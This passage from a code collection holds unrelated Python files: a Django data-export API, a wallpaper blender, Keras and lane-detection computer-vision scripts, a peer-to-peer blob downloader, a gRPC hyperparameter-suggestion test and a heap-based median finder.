{0} ERROR: {1}'.format( str(exception), traceback.format_exc().replace('\n', '') )) return HttpResponse(json.dumps({'error': str(exception)}), status=400) try: rows, _, _ = _get_content(date, columns, constraints, order_clauses, PREVIEW_LIMIT) return_value = {'data': [[str(element) for element in row] for row in rows]} return HttpResponse(json.dumps(return_value)) except Exception as exception: LOGGER.log_error('api_preview_data_query_failed', 'Failed retrieving daily preview data. {0} ERROR: {1}'.format( str(exception), traceback.format_exc().replace('\n', '') )) return HttpResponse( json.dumps({'error': 'Server encountered error when delivering dataset sample.'}), status=500 ) @csrf_exempt def get_date_range(request): try: min_date, max_date = PGM.get_min_and_max_dates() return HttpResponse(json.dumps({'date': {'min': str(min_date), 'max': str(max_date)}})) except Exception as exception: LOGGER.log_error('api_date_range_query_failed', 'Failed retrieving date range for logs. ERROR: {0}'.format( traceback.format_exc().replace('\n', '') )) return HttpResponse( json.dumps({'error': 'Server encountered error when calculating min and max dates.'}), status=500 ) @csrf_exempt def get_column_data(request): postgres_to_python_type = {'varchar(255)': 'string', 'bigint': 'integer', 'integer': 'integer', 'date': 'date (YYYY-MM-DD)', 'boolean': 'boolean'} type_to_operators = { 'string': ['=', '!='], 'boolean': ['=', '!='], 'integer': ['=', '!=', '<', '<=', '>', '>='], 'date (YYYY-MM-DD)': ['=', '!=', '<', '<=', '>', '>='], } try: data = [] for column_name in FIELD_DESCRIPTIONS: datum = {'name': column_name} datum['description'] = FIELD_DESCRIPTIONS[column_name]['description'] datum['type'] = postgres_to_python_type[FIELD_DESCRIPTIONS[column_name]['type']] datum['valid_operators'] = type_to_operators[datum['type']] data.append(datum) return HttpResponse(json.dumps({'columns': data})) except Exception as exception: LOGGER.log_error('api_column_data_query_failed', 'Failed retrieving column data. 
ERROR: {0}'.format( traceback.format_exc().replace('\n', '') )) return HttpResponse( json.dumps({'error': 'Server encountered error when listing column data.'}), status=500 ) def _generate_gzipped_file(date, columns, constraints, order_clauses): rows, columns, date_columns = _get_content(date, columns, constraints, order_clauses) tarball_bytes = BytesIO() with tarfile.open(fileobj=tarball_bytes, mode='w:gz') as tarball: data_file, data_info = _generate_json_file(columns, rows, date_columns, date) meta_file, meta_info = _generate_meta_file(columns, constraints, order_clauses, date_columns) tarball.addfile(data_info, data_file) tarball.addfile(meta_info, meta_file) return tarball_bytes.getvalue() def _get_content(date, columns, constraints, order_clauses, limit=None): constraints.append({'column': 'requestInDate', 'operator': '=', 'value': date.strftime('%Y-%m-%d')}) column_names_and_types = PGM.get_column_names_and_types() if not columns: # If no columns are specified, all must be returned columns = [column_name for column_name, _ in column_names_and_types] date_columns = [column_name for column_name, column_type in column_names_and_types if column_type == 'date' and column_name in columns] rows = PGM.get_data(constraints=constraints, columns=columns, order_by=order_clauses, limit=limit) return rows, columns, date_columns def _generate_json_file(column_names, rows, date_columns, date): json_content = [] for row in rows: json_obj = {column_name: row[column_idx] for column_idx, column_name in enumerate(column_names)} for date_column in date_columns: # Must manually convert Postgres dates to string to be compatible with JSON format json_obj[date_column] = datetime.strftime(json_obj[date_column], '%Y-%m-%d') json_content.append(json.dumps(json_obj)) json_content.append('') # Hack to get \n after the last JSON object json_file_content = ('\n'.join(json_content)).encode('utf8') info = tarfile.TarInfo(date.strftime('%Y-%m-%d') + '.json') info.size = len(json_file_content) info.mtime = time.time() return BytesIO(json_file_content), info def _generate_meta_file(columns, constraints, order_clauses, date_columns): if 'requestInDate' not in date_columns: date_columns += ['requestInDate'] meta_dict = {} meta_dict['descriptions'] = {field: FIELD_DESCRIPTIONS[field]['description'] for field in FIELD_DESCRIPTIONS} meta_dict['query'] = {'fields': columns, 'constraints': constraints, 'order_by': [' '.join(order_clause) for order_clause in order_clauses]} content = json.dumps(meta_dict).encode('utf8') info = tarfile.TarInfo('meta.json') info.size = len(content) info.mtime = time.time() return BytesIO(content), info def _gzip_content(content): output_bytes = BytesIO() with GzipFile(fileobj=output_bytes, mode='wb') as gzip_file: input_bytes = BytesIO(content.encode('utf8')) gzip_file.writelines(input_bytes) return output_bytes.getvalue()
python
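A stripped-down, self-contained version of the in-memory tarball pattern used by _generate_gzipped_file and _generate_json_file above: JSON lines go into a BytesIO buffer, which is added to a gzipped tar archive without touching disk. The rows and the file name here are invented for the example.

import json
import tarfile
import time
from io import BytesIO

rows = [{"id": 1, "requestInDate": "2024-01-01"}, {"id": 2, "requestInDate": "2024-01-01"}]
payload = ("\n".join(json.dumps(r) for r in rows) + "\n").encode("utf8")

buf = BytesIO()
with tarfile.open(fileobj=buf, mode="w:gz") as tarball:
    info = tarfile.TarInfo("2024-01-01.json")
    info.size = len(payload)
    info.mtime = time.time()
    tarball.addfile(info, BytesIO(payload))

print(len(buf.getvalue()), "bytes of gzipped tarball")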
import os.path from PIL import Image import json appdata_folder = os.path.join(os.environ["LOCALAPPDATA"], "Nightshift") def generate_wallpapers(day_img_path, night_img_path, step_count): print "Generating {0} images from {1} and {2} to {3}"\ .format(step_count, day_img_path, night_img_path, appdata_folder) if not os.path.exists(day_img_path) or not os.path.exists(night_img_path) \ or os.path.isdir(day_img_path) or os.path.isdir(night_img_path): raise IOError("Day image or night image not found.") _, day_ext = os.path.splitext(day_img_path) _, night_ext = os.path.splitext(night_img_path) if day_ext not in [".jpeg", ".jpg"] or night_ext not in [".jpeg", ".jpg"]: print "Images will be converted to .jpg." try: day_image = Image.open(day_img_path) night_image = Image.open(night_img_path) except IOError: print "Could not read image files." raise if day_image.size != night_image.size: print "The two wallpapers must be the same size." raise Exception("The two wallpapers must be the same size.") try: if not os.path.exists(appdata_folder): os.mkdir(appdata_folder) else: cleanup_old_wallpapers() blend_save_image(day_image, night_image, 0) for step in range(1, step_count + 1): opacity = step / float(step_count) blend_save_image(day_image, night_image, opacity) except: print "Could not generate wallpapers." raise try: output_file = open(os.path.join(appdata_folder, "images.json"), "w") json.dump({"step_count": step_count, "format": ".jpg"}, output_file) output_file.close() except IOError: print "Could not write image settings." raise print "Images generated correctly." def cleanup_old_wallpapers(): print "Cleaning up wallpaper directory." for item in os.listdir(appdata_folder): if item.endswith(".jpg"): os.remove(os.path.join(appdata_folder, item)) def blend_save_image(day_image, night_image, opacity): blended_image = Image.blend(day_image, night_image, opacity) blended_image.save(os.path.join(appdata_folder, format(int(opacity * 255), "03d") + ".jpg"), quality=95) blended_image.close() def get_wallpaper_params(): print "Getting saved wallpaper params." try: file_obj = open(os.path.join(appdata_folder, "images.json"), "r") result = json.load(file_obj) file_obj.close() return result except IOError: print "Could not read from wallpaper params file." print "Try generating the wallpaper images with" print "Nightshift.exe -g path_to_day_image path_to_night_image step_count" raise except: print "Could not get saved location." raise
python
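A tiny check of the Image.blend step used by blend_save_image above (Pillow assumed to be installed); two small solid-colour frames stand in for the day and night wallpapers, so nothing is read from disk.

from PIL import Image

day = Image.new("RGB", (4, 4), (255, 255, 255))   # stand-in for the day wallpaper
night = Image.new("RGB", (4, 4), (0, 0, 0))       # stand-in for the night wallpaper
assert day.size == night.size                     # the generator requires equal sizes
half = Image.blend(day, night, 0.5)               # opacity 0.5, halfway between the two
print(half.getpixel((0, 0)))                      # roughly (127, 127, 127); exact value depends on rounding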
""" adapted from keras example cifar10_cnn.py Train ResNet-18 on the CIFAR10 small images dataset. GPU run command with Theano backend (with TensorFlow, the GPU is automatically used): THEANO_FLAGS=mode=FAST_RUN,device=gpu,floatX=float32 python cifar10.py """ from __future__ import print_function import tensorflow as tf config = tf.ConfigProto() config.gpu_options.allow_growth=True sess = tf.Session(config=config) from keras.preprocessing.image import ImageDataGenerator from keras.utils import np_utils from keras.callbacks import ReduceLROnPlateau, CSVLogger, EarlyStopping import tensorflow as tf import sys import datetime import os import shutil from keras.optimizers import Adam, Adadelta from convnets import AlexNet_FCN from datagenerator import data_gen import keras.backend as K import numpy as np import dataloader import datagenerator from keras.backend.tensorflow_backend import set_session from keras.metrics import top_k_categorical_accuracy def top_3_accuracy(y_true, y_pred): return top_k_categorical_accuracy(y_true, y_pred, k=3) set_session(sess) t = datetime.datetime.now().strftime("%Y%m%d%H%M%S") print(t) batch_size = 32 nb_classes = 14 nb_epoch = 100 outs = 31 data_augmentation = True # The data, shuffled and split between train and test sets: dataset_fn = '../../../data_preprocessing/material_dataset.txt' imgs_fn = '../../../../storage/center_227x227.npz' weights_fn = '../../../../storage/alexnet_weights.h5' #sz = 227 sz = 300 img_rows = sz img_cols = sz img_channels = 3 with tf.device('/gpu:0'): lr_reducer = ReduceLROnPlateau(factor=np.sqrt(0.1), cooldown=0, patience=5, min_lr=0.5e-6) early_stopper = EarlyStopping(min_delta=0.001, patience=10) csv_logger = CSVLogger('alexnet.csv') #model = resnet.ResnetBuilder.build_resnet_18((img_channels, img_rows, img_cols), nb_classes) #model = resnet.ResnetBuilder.build_resnet_50((img_channels, img_rows, img_cols), nb_classes) model, outs = AlexNet_FCN(nb_classes=nb_classes, sz=sz) #model = AlexNet(weights_fn, nb_classes=nb_classes, sz=sz) #model = AlexNet(weights_fn, nb_classes=nb_classes) print("outs", outs) #opt = Adadelta(lr=0.01, rho=0.95, epsilon=1e-08, decay=0.0) #opt = Adadelta(lr=1, rho=0.95, epsilon=1e-08, decay=0.0) def sum_loss(y_true, y_pred): y_true = K.reshape(y_true, [batch_size*outs*outs, nb_classes]) y_pred = K.reshape(y_pred, [batch_size*outs*outs, nb_classes]) s = K.mean(K.categorical_crossentropy(y_true, y_pred)) return s opt = Adam(lr=0.0001, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0) model.compile(#loss='categorical_crossentropy', loss=sum_loss, optimizer=opt, #metrics=['accuracy', top_3_accuracy]) metrics=['accuracy']) if data_augmentation: print('Using real-time data augmentation.') # This will do preprocessing and realtime data augmentation: r = 0.2 datagen = ImageDataGenerator(featurewise_center=False, samplewise_center=False, featurewise_std_normalization=False, samplewise_std_normalization=False, zca_whitening=False, rotation_range=r*100, width_shift_range=r, height_shift_range=r, shear_range=r, zoom_range=r, channel_shift_range=r, fill_mode='nearest', cval=0., horizontal_flip=True, vertical_flip=False, rescale=None, preprocessing_function=None) # Compute quantities required for featurewise normalization # (std, mean, and principal components if ZCA whitening is applied). 
#datagen.fit(X_train) def print_log(y_pred, Z, log_fn, k=5): fout = open(log_fn, 'w') acc1 = 0 acc3 = 0 cnt = 0 for i in range(0, len(y_pred), k): img_fn = Z[i][0] label = Z[i][1] loc = Z[i][2] print(img_fn, label, end=' ', file=fout) y_sum = np.sum(y_pred[i:i+k], axis=0) y_sum = np.sum(np.sum(y_sum, axis=0), axis=0) y = [(j, y_sum[j]) for j in range(nb_classes)] y_sorted = sorted(y, key=lambda d:d[1], reverse=True) for j in y_sorted[:5]: print(j[0], end=' ', file=fout) print("", file=fout) if y_sorted[0][0] == label: acc1 += 1 if y_sorted[0][0] == label or y_sorted[1][0] == label or y_sorted[2][0] == label: acc3 += 1 y_sum = np.zeros_like(y_pred[0]) cnt += 1 fout.close() return acc1 * 1.0 / cnt, acc3 * 1.0 / cnt def predict(model, val=True): y_preds = [] Z = [] for (x, y, z) in datagenerator.test_generator(dataset_fn, imgs_fn, val=val, sz=img_rows): y_pred = model.predict(x, batch_size=batch_size) y_preds.append(y_pred) Z = Z + z y_preds = np.vstack(y_preds) return y_preds, Z log_dir = '../../../../result/alexnet/{}/'.format(t) os.mkdir(log_dir) shutil.copy('./fabric_train.py', log_dir+'fabric_train.py') shutil.copy('./convnets.py', log_dir+'convnets.py') G = data_gen('../../../data_preprocessing/material_dataset.txt', batch_size=batch_size, datagen=datagen, sz=sz, outs=outs) # Fit the model on the batches generated by datagen.flow(). for epochs in range(nb_epoch): model.fit_generator(#datagen.flow(X_train, Y_train, batch_size=batch_size), #steps_per_epoch=X_train.shape[0] // batch_size, G, steps_per_epoch=500, epochs=1, verbose=1, max_q_size=100) #y_pred_valid = model.predict(X_valid, batch_size=batch_size) #y_pred_test = model.predict(X_test, batch_size=batch_size) y_pred_valid, Z_valid = predict(model, val=True) y_pred_test, Z_test = predict(model, val=False) k = 1 log_fn = log_dir + '.tmp.txt' val_acc = print_log(y_pred_valid, Z_valid, log_fn, k=k) test_acc = print_log(y_pred_test, Z_test, log_fn, k=k) log_fn = log_dir + 'val_{:02d}'.format(epochs) + '_{:.4f}_{:.4f}'.format(val_acc[1], test_acc[1]) + '.txt' print_log(y_pred_valid, Z_valid, log_fn, k=k) log_fn = log_dir + '{:02d}'.format(epochs) + '_{:.4f}_{:.4f}'.format(val_acc[1], test_acc[1]) + '.txt' print_log(y_pred_test, Z_test, log_fn, k=k) print(epochs, val_acc, test_acc)
python
class MiscUtils: def __init__(self): import requests import json r = requests.get("https://backpack.tf/filters") obj = json.loads(r.text) particles = obj['particle'] qualities = obj['quality'] rarities = obj['rarity'] paints = obj['paint'] origins = obj['origin'] wear_tiers = obj['wear_tiers'] killstreakers = obj['killstreakers'] sheens = obj['sheens'] killstreak_tiers = obj['killstreak_tiers'] strange_parts = obj['strange_parts'] self.particleObj = {} self.qualitiesObj = {} self.raritiesObj = {} self.paintsObj = {} self.originsObj = {} self.wear_tiersObj = {} self.killstreakers = {} self.sheensObj = {} self.killstreak_tiers = {} self.strange_partsObj = {} for particle in particles: self.particleObj[particle['name'].lower()] = int(particle['id']) for quality in qualities: self.qualitiesObj[quality['name'].lower()] = int(quality['id']) for rarity in rarities: self.raritiesObj[rarity['name'].lower()] = int(rarity['id']) for paint in paints: self.paintsObj[paint['name'].lower()] = int(paint['id']) for particle in origins: self.originsObj[particle['name'].lower()] = int(particle['id']) for particle in wear_tiers: self.wear_tiersObj[wear_tiers[particle]['name'].lower()] = int(wear_tiers[particle]['id']) for particle in killstreakers: self.killstreakers[particle['name'].lower()] = int(particle['id']) for particle in sheens: self.sheensObj[particle['name'].lower()] = int(particle['id']) for particle in killstreak_tiers: self.killstreak_tiers[particle['name'].lower()] = int(particle['id']) for particle in strange_parts: self.strange_partsObj[particle['name'].lower()] = int(particle['id']) # # Converts quality string to quality int # def quality_String_To_Int(self, string): try: return self.qualitiesObj[string.lower()] except: return "" # # Converts particle string to particle int # def particle_String_To_Int(self, string): try: return self.particleObj[string.lower()] except: return "" # # Converts rarity string to rarity int # def rarity_String_To_Int(self, string): try: return self.raritiesObj[string.lower()] except: return "" # # Origin quality string to origin int # def origin_String_To_Int(self, string): try: return self.originsObj[string.lower()] except: return "" # # Converts wear_tier string to wear_tier int # def wear_tier_String_To_Int(self, string): try: return self.wear_tiersObj[string.lower()] except: return "" # # Converts killstreaker string to killstreaker int # def killstreaker_String_To_Int(self, string): try: return self.killstreakers[string.lower()] except: return "" # # Converts sheen string to sheen int # def sheen_String_To_Int(self, string): try: return self.sheensObj[string.lower()] except: return "" # # Converts killstreak_tier string to killstreak_tier int # def killstreak_tier_String_To_Int(self, string): try: return self.killstreak_tiers[string.lower()] except: return "" # # Converts strange_part string to strange_part int # def strange_parts_String_To_Int(self, string): try: return self.strange_partsObj[string.lower()] except: return "" # # Converts paint string to paint int # def paint_String_To_Int(self, string): try: return self.paintsObj[string.lower()] except: return "" # # Converts steam ID into the account_id account ID is used in trading requests # def steam_id_to_account_id(self, steam_id): import struct return str(struct.unpack('>L', int(steam_id).to_bytes(8, byteorder='big')[4:])[0])
python
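A quick check of the SteamID64 to account-ID conversion in steam_id_to_account_id above: unpacking the last four big-endian bytes is the same as keeping the low 32 bits. The ID below is made up; 76561197960265728 is the usual base offset for individual SteamID64 values.

import struct

steam_id = 76561197960265728 + 12345   # hypothetical 64-bit SteamID
via_struct = struct.unpack('>L', int(steam_id).to_bytes(8, byteorder='big')[4:])[0]
via_mask = int(steam_id) & 0xFFFFFFFF
print(via_struct, via_mask)            # both print 12345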
import asyncio import typing import logging from lbrynet.utils import drain_tasks from lbrynet.blob_exchange.client import request_blob if typing.TYPE_CHECKING: from lbrynet.conf import Config from lbrynet.dht.node import Node from lbrynet.dht.peer import KademliaPeer from lbrynet.blob.blob_manager import BlobFileManager from lbrynet.blob.blob_file import BlobFile log = logging.getLogger(__name__) class BlobDownloader: BAN_TIME = 10.0 # fixme: when connection manager gets implemented, move it out from here def __init__(self, loop: asyncio.BaseEventLoop, config: 'Config', blob_manager: 'BlobFileManager', peer_queue: asyncio.Queue): self.loop = loop self.config = config self.blob_manager = blob_manager self.peer_queue = peer_queue self.active_connections: typing.Dict['KademliaPeer', asyncio.Task] = {} # active request_blob calls self.ignored: typing.Dict['KademliaPeer', int] = {} self.scores: typing.Dict['KademliaPeer', int] = {} self.connections: typing.Dict['KademliaPeer', asyncio.Transport] = {} self.time_since_last_blob = loop.time() def should_race_continue(self, blob: 'BlobFile'): if len(self.active_connections) >= self.config.max_connections_per_download: return False # if a peer won 3 or more blob races and is active as a downloader, stop the race so bandwidth improves # the safe net side is that any failure will reset the peer score, triggering the race back # TODO: this is a good idea for low bandwidth, but doesnt play nice on high bandwidth # for peer, task in self.active_connections.items(): # if self.scores.get(peer, 0) >= 0 and self.rounds_won.get(peer, 0) >= 3 and not task.done(): # return False return not (blob.get_is_verified() or blob.file_exists) async def request_blob_from_peer(self, blob: 'BlobFile', peer: 'KademliaPeer'): if blob.get_is_verified(): return self.scores[peer] = self.scores.get(peer, 0) - 1 # starts losing score, to account for cancelled ones transport = self.connections.get(peer) start = self.loop.time() bytes_received, transport = await request_blob( self.loop, blob, peer.address, peer.tcp_port, self.config.peer_connect_timeout, self.config.blob_download_timeout, connected_transport=transport ) if bytes_received == blob.get_length(): self.time_since_last_blob = self.loop.time() if not transport and peer not in self.ignored: self.ignored[peer] = self.loop.time() log.debug("drop peer %s:%i", peer.address, peer.tcp_port) if peer in self.connections: del self.connections[peer] elif transport: log.debug("keep peer %s:%i", peer.address, peer.tcp_port) self.connections[peer] = transport rough_speed = (bytes_received / (self.loop.time() - start)) if bytes_received else 0 self.scores[peer] = rough_speed async def new_peer_or_finished(self, blob: 'BlobFile'): async def get_and_re_add_peers(): try: new_peers = await asyncio.wait_for(self.peer_queue.get(), timeout=1.0) self.peer_queue.put_nowait(new_peers) except asyncio.TimeoutError: pass tasks = [self.loop.create_task(get_and_re_add_peers()), self.loop.create_task(blob.verified.wait())] active_tasks = list(self.active_connections.values()) try: await asyncio.wait(tasks + active_tasks, loop=self.loop, return_when='FIRST_COMPLETED') finally: drain_tasks(tasks) def cleanup_active(self): to_remove = [peer for (peer, task) in self.active_connections.items() if task.done()] for peer in to_remove: del self.active_connections[peer] def clearbanned(self): now = self.loop.time() if now - self.time_since_last_blob > 60.0: return forgiven = [banned_peer for banned_peer, when in self.ignored.items() if now - when > 
self.BAN_TIME] self.peer_queue.put_nowait(forgiven) for banned_peer in forgiven: self.ignored.pop(banned_peer) async def download_blob(self, blob_hash: str, length: typing.Optional[int] = None) -> 'BlobFile': blob = self.blob_manager.get_blob(blob_hash, length) if blob.get_is_verified(): return blob try: while not blob.get_is_verified(): batch: typing.List['KademliaPeer'] = [] while not self.peer_queue.empty(): batch.extend(self.peer_queue.get_nowait()) batch.sort(key=lambda peer: self.scores.get(peer, 0), reverse=True) log.debug( "running, %d peers, %d ignored, %d active", len(batch), len(self.ignored), len(self.active_connections) ) for peer in batch: if not self.should_race_continue(blob): break if peer not in self.active_connections and peer not in self.ignored: log.debug("request %s from %s:%i", blob_hash[:8], peer.address, peer.tcp_port) t = self.loop.create_task(self.request_blob_from_peer(blob, peer)) self.active_connections[peer] = t await self.new_peer_or_finished(blob) self.cleanup_active() if batch: self.peer_queue.put_nowait(set(batch).difference(self.ignored)) else: self.clearbanned() blob.close() log.debug("downloaded %s", blob_hash[:8]) return blob finally: while self.active_connections: self.active_connections.popitem()[1].cancel() def close(self): self.scores.clear() self.ignored.clear() for transport in self.connections.values(): transport.close() async def download_blob(loop, config: 'Config', blob_manager: 'BlobFileManager', node: 'Node', blob_hash: str) -> 'BlobFile': search_queue = asyncio.Queue(loop=loop, maxsize=config.max_connections_per_download) search_queue.put_nowait(blob_hash) peer_queue, accumulate_task = node.accumulate_peers(search_queue) downloader = BlobDownloader(loop, config, blob_manager, peer_queue) try: return await downloader.download_blob(blob_hash) finally: if accumulate_task and not accumulate_task.done(): accumulate_task.cancel() downloader.close()
python
import grpc from pkg.api.python import api_pb2 from pkg.api.python import api_pb2_grpc from pkg.suggestion.test_func import func from pkg.suggestion.types import DEFAULT_PORT def run(): channel = grpc.insecure_channel(DEFAULT_PORT) stub = api_pb2_grpc.SuggestionStub(channel) set_param_response = stub.SetSuggestionParameters(api_pb2.SetSuggestionParametersRequest( study_id="1", suggestion_parameters=[ api_pb2.SuggestionParameter( name="N", value="100", ), api_pb2.SuggestionParameter( name="kernel_type", value="matern", ), api_pb2.SuggestionParameter( name="mode", value="ei", ), api_pb2.SuggestionParameter( name="trade_off", value="0.01", ), api_pb2.SuggestionParameter( name="model_type", value="gp", ), api_pb2.SuggestionParameter( name="n_estimators", value="50", ), ] )) completed_trials = [] maximum = -1 iter = 0 for i in range(30): response = stub.GenerateTrials(api_pb2.GenerateTrialsRequest( study_id="1", configs=api_pb2.StudyConfig( name="test_study", owner="me", optimization_type=api_pb2.MAXIMIZE, optimization_goal=0.2, parameter_configs=api_pb2.StudyConfig.ParameterConfigs( configs=[ # api_pb2.ParameterConfig( # name="param1", # parameter_type=api_pb2.INT, # feasible=api_pb2.FeasibleSpace(max="5", min="1", list=[]), # ), # api_pb2.ParameterConfig( # name="param2", # parameter_type=api_pb2.CATEGORICAL, # feasible=api_pb2.FeasibleSpace(max=None, min=None, list=["cat1", "cat2", "cat3"]) # ), # api_pb2.ParameterConfig( # name="param3", # parameter_type=api_pb2.DISCRETE, # feasible=api_pb2.FeasibleSpace(max=None, min=None, list=["3", "2", "6"]) # ), # api_pb2.ParameterConfig( # name="param4", # parameter_type=api_pb2.DOUBLE, # feasible=api_pb2.FeasibleSpace(max="5", min="1", list=[]) # ) api_pb2.ParameterConfig( name="param1", parameter_type=api_pb2.DOUBLE, feasible=api_pb2.FeasibleSpace(max="1", min="0", list=[]), ), api_pb2.ParameterConfig( name="param2", parameter_type=api_pb2.DOUBLE, feasible=api_pb2.FeasibleSpace(max="1", min="0", list=[]) ), ], ), access_permissions=[], suggest_algorithm="BO", autostop_algorithm="", study_task_name="task", suggestion_parameters=[], tags=[], objective_value_name="precision", metrics=[], image="", command=["", ""], gpu=0, scheduler="", mount=api_pb2.MountConf( pvc="", path="", ), pull_secret="" ), completed_trials=completed_trials, running_trials=[],) ) x1 = response.trials[0].parameter_set[0].value x2 = response.trials[0].parameter_set[1].value objective_value = func(float(x1), float(x2)) if objective_value > maximum: maximum = objective_value iter = i print(objective_value) completed_trials.append(api_pb2.Trial( trial_id=response.trials[0].trial_id, study_id="1", status=api_pb2.COMPLETED, eval_logs=[], objective_value=str(objective_value), parameter_set=[ api_pb2.Parameter( name="param1", parameter_type=api_pb2.DOUBLE, value=x1, ), api_pb2.Parameter( name="param2", parameter_type=api_pb2.DOUBLE, value=x2, ), ] )) print(str(response.trials[0].parameter_set)) stop_study_response = stub.StopSuggestion(api_pb2.StopStudyRequest( study_id="1" )) print("found the maximum: {} at {} iteration".format(maximum, iter)) if __name__ == "__main__": run()
python
# -*- coding: utf-8 -*- # @Time: 2020/10/10 11:58 # @Author: GraceKoo # @File: interview_63.py # @Desc: https://leetcode-cn.com/problems/shu-ju-liu-zhong-de-zhong-wei-shu-lcof/ from heapq import * class MedianFinder: def __init__(self): """ initialize your data structure here. """ self.A = [] # 大顶堆,存放较小的元素 self.B = [] # 小顶堆,存放较大的元素,使得B的最小的元素也比A中最大的元素大,保证数据流保持有序 def addNum(self, num: int) -> None: # 数据流长度为奇数时,需向A中插入元素:先向B中插入num,再将B的堆顶元素插入至A,保证B比A大 if len(self.A) != len(self.B): heappush(self.B, num) heappush(self.A, -heappop(self.B)) # 数据流长度为偶数时,需向B中插入元素:先向A中插入num,再将A的堆顶元素插入至B,保证B比A大 else: heappush(self.A, -num) heappush(self.B, -heappop(self.A)) def findMedian(self) -> float: if len(self.A) != len(self.B): return self.B[0] else: return (-self.A[0] + self.B[0]) / 2.0 # Your MedianFinder object will be instantiated and called as such: # obj = MedianFinder() # obj.addNum(num) # param_2 = obj.findMedian()
python
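# A minimal usage sketch of the two-heap MedianFinder above (assumes the class
# is in scope). A keeps the smaller half as negated values and B the larger
# half, so an odd-length stream reads its median from B[0] and an even-length
# stream averages the two heap tops.
mf = MedianFinder()
mf.addNum(1)
mf.addNum(2)
print(mf.findMedian())  # 1.5
mf.addNum(3)
print(mf.findMedian())  # 2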
import pytest from pytest_cases.case_parametrizer_legacy import get_pytest_marks_on_function, make_marked_parameter_value def test_get_pytest_marks(): """ Tests that we are able to correctly retrieve the marks on case_func :return: """ skip_mark = pytest.mark.skipif(True, reason="why") @skip_mark def case_func(): pass # extract the marks from a case function marks = get_pytest_marks_on_function(case_func, as_decorators=True) # check that the mark is the same than a manually made one assert len(marks) == 1 assert str(marks[0]) == str(skip_mark) # transform a parameter into a marked parameter dummy_case = (1, 2, 3) marked_param = make_marked_parameter_value((dummy_case,), marks=marks)
python
from Game import game class MyClass(object): gamenew = game() def executegame(self): self.gamenew.gamce() print('test') if __name__ == '__main__': a = MyClass() a.executegame()
python
import numpy as np import cv2 import matplotlib.pyplot as plt import matplotlib.image as mpimg import pickle from combined_thresh import combined_thresh from perspective_transform import perspective_transform from Line import Line from line_fit import line_fit, tune_fit, final_viz, calc_curve, calc_vehicle_offset, viz2 from moviepy.editor import VideoFileClip # Global variables (just to make the moviepy video annotation work) with open('calibrate_camera.p', 'rb') as f: save_dict = pickle.load(f) mtx = save_dict['mtx'] dist = save_dict['dist'] window_size = 5 # how many frames for line smoothing left_line = Line(n=window_size) right_line = Line(n=window_size) detected = False # did the fast line fit detect the lines? left_curve, right_curve = 0., 0. # radius of curvature for left and right lanes left_lane_inds, right_lane_inds = None, None # for calculating curvature frameCount = 0 retLast = {} # MoviePy video annotation will call this function def annotate_image(img_in): """ Annotate the input image with lane line markings Returns annotated image """ global mtx, dist, left_line, right_line, detected, frameCount, retLast global left_curve, right_curve, left_lane_inds, right_lane_inds frameCount += 1 src = np.float32( [[200, 720], [1100, 720], [520, 500], [760, 500]]) x = [src[0, 0], src[1, 0], src[3, 0], src[2, 0], src[0, 0]] y = [src[0, 1], src[1, 1], src[3, 1], src[2, 1], src[0, 1]] # Undistort, threshold, perspective transform undist = cv2.undistort(img_in, mtx, dist, None, mtx) img, abs_bin, mag_bin, dir_bin, hls_bin = combined_thresh(undist) binary_warped, binary_unwarped, m, m_inv = perspective_transform(img) # Perform polynomial fit if not detected: # Slow line fit ret = line_fit(binary_warped) # if detect no lanes, use last result instead. if len(ret) == 0: ret = retLast left_fit = ret['left_fit'] right_fit = ret['right_fit'] nonzerox = ret['nonzerox'] nonzeroy = ret['nonzeroy'] out_img = ret['out_img'] left_lane_inds = ret['left_lane_inds'] right_lane_inds = ret['right_lane_inds'] histogram = ret['histo'] # Get moving average of line fit coefficients left_fit = left_line.add_fit(left_fit) right_fit = right_line.add_fit(right_fit) # Calculate curvature left_curve, right_curve = calc_curve(left_lane_inds, right_lane_inds, nonzerox, nonzeroy) detected = True # slow line fit always detects the line else: # implies detected == True # Fast line fit left_fit = left_line.get_fit() right_fit = right_line.get_fit() ret = tune_fit(binary_warped, left_fit, right_fit) left_fit = ret['left_fit'] right_fit = ret['right_fit'] nonzerox = ret['nonzerox'] nonzeroy = ret['nonzeroy'] left_lane_inds = ret['left_lane_inds'] right_lane_inds = ret['right_lane_inds'] # Only make updates if we detected lines in current frame if ret is not None: left_fit = ret['left_fit'] right_fit = ret['right_fit'] nonzerox = ret['nonzerox'] nonzeroy = ret['nonzeroy'] left_lane_inds = ret['left_lane_inds'] right_lane_inds = ret['right_lane_inds'] left_fit = left_line.add_fit(left_fit) right_fit = right_line.add_fit(right_fit) left_curve, right_curve = calc_curve(left_lane_inds, right_lane_inds, nonzerox, nonzeroy) else: detected = False vehicle_offset = calc_vehicle_offset(undist, left_fit, right_fit) # Perform final visualization on top of original undistorted image result = final_viz(undist, left_fit, right_fit, m_inv, left_curve, right_curve, vehicle_offset) retLast = ret save_viz2 = './output_images/polyfit_test%d.jpg' % (frameCount) viz2(binary_warped, ret, save_viz2) save_warped = './output_images/warped_test%d.jpg' % 
(frameCount) plt.imshow(binary_warped, cmap='gray', vmin=0, vmax=1) if save_warped is None: plt.show() else: plt.savefig(save_warped) plt.gcf().clear() save_binary = './output_images/binary_test%d.jpg' % (frameCount) plt.imshow(img, cmap='gray', vmin=0, vmax=1) if save_binary is None: plt.show() else: plt.savefig(save_binary) plt.gcf().clear() if frameCount > 0: fig = plt.gcf() fig.set_size_inches(16.5, 8.5) plt.subplot(2, 3, 1) plt.imshow(undist) # plt.plot(undist) plt.plot(x, y) plt.title('undist') plt.subplot(2, 3, 2) plt.imshow(hls_bin, cmap='gray', vmin=0, vmax=1) plt.title('hls_bin') plt.subplot(2, 3, 3) plt.imshow(abs_bin, cmap='gray', vmin=0, vmax=1) plt.title('abs_bin') plt.subplot(2, 3, 4) plt.imshow(img, cmap='gray', vmin=0, vmax=1) plt.title('img') plt.subplot(2, 3, 5) plt.imshow(out_img) plt.title('out_img') plt.subplot(2, 3, 6) plt.imshow(result, cmap='gray', vmin=0, vmax=1) plt.title('result') save_result = 'D:/code/github_code/CarND-Advanced-Lane-Lines-P4/output_images/result-test%d.jpg' % (frameCount) if save_result is None: plt.show() else: plt.savefig(save_result) plt.gcf().clear() return result def annotate_video(input_file, output_file): """ Given input_file video, save annotated video to output_file """ video = VideoFileClip(input_file) annotated_video = video.fl_image(annotate_image) annotated_video.write_videofile(output_file, audio=False) if __name__ == '__main__': # Annotate the video # annotate_video('challenge_video.mp4', 'challenge_video_out.mp4') # Show example annotated image on screen for sanity check for i in range (1, 7): img_file = 'test_images/test%d.jpg' % 